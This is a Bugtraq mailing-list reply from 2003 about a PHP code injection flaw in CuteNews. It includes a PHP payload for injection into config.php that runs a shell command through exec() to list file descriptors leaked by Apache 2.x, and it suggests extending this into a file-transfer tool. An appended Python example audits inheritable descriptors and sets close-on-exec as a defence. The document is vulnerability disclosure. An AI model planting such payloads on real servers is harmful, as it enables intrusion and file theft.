Bugtraq mailing list archives

Re: PHP code injection in CuteNews


From: Steve Grubb <linux_4ever () yahoo com>
Date: 28 Feb 2003 22:18:05 -0000

In-Reply-To: <E18ndJT-000JS2-00 () f19 mail ru>

Hello,

If the CuteNews website is running Apache 2.x, which
leaks descriptors to all kinds of things
(http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2),
then you can do this:

config.php = 

<html><head><title>File List</title></head>
<body> <?php
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
        $match = preg_split("/> /", $item);
        if ($match[1]) {
                if (preg_match("/\//", $match[1])) {
                        echo $match[1]; echo "<br>";
                }
        }
}
?> </body></html>

It doesn't take a lot more to make this a fully
clickable file transfer utility that sandboxes or jails
cannot protect.

-Steve Grubb
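
An added example, not part of the original message or of Apache or CuteNews: one way to audit a process for descriptors that every program it executes will inherit, which is the condition the message depends on, and to mark them close-on-exec. The function names and the temporary file standing in for a server-opened file are constructed for illustration.

```python
import fcntl
import os
import subprocess
import sys
import tempfile

def inheritable_fds(max_fd=1024):
    """Map fd -> target for open descriptors that lack FD_CLOEXEC,
    i.e. descriptors that every exec'd child (CGI, PHP exec()) receives."""
    found = {}
    for fd in range(3, max_fd):
        try:
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
        except OSError:
            continue  # fd is not open
        if not flags & fcntl.FD_CLOEXEC:
            try:
                found[fd] = os.readlink(f"/proc/self/fd/{fd}")
            except OSError:
                found[fd] = "?"  # no /proc on this platform
    return found

def set_cloexec(fd):
    """Mark fd close-on-exec so the kernel closes it across exec()."""
    flags = fcntl.fcntl(fd, fcntl.F_GETFD)
    fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)

def child_has(fd):
    """Exec a child without any fd cleanup and report whether it holds
    the same open file as our fd (compared by device and inode)."""
    probe = ("import os\n"
             f"try:\n    s = os.fstat({fd}); print(s.st_dev, s.st_ino)\n"
             "except OSError:\n    print('closed')\n")
    out = subprocess.run([sys.executable, "-c", probe], close_fds=False,
                         capture_output=True, text=True).stdout.strip()
    st = os.fstat(fd)
    return out == f"{st.st_dev} {st.st_ino}"

def demo():
    # Constructed stand-in for a file a server opened without close-on-exec.
    with tempfile.NamedTemporaryFile() as f:
        fd = f.fileno()
        os.set_inheritable(fd, True)
        before = (fd in inheritable_fds(), child_has(fd))
        set_cloexec(fd)
        after = (fd in inheritable_fds(), child_has(fd))
    return before, after

if __name__ == "__main__":
    print(demo())
```

Running `inheritable_fds()` from inside a long-lived service, just before it spawns helpers, lists what those helpers would be handed.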

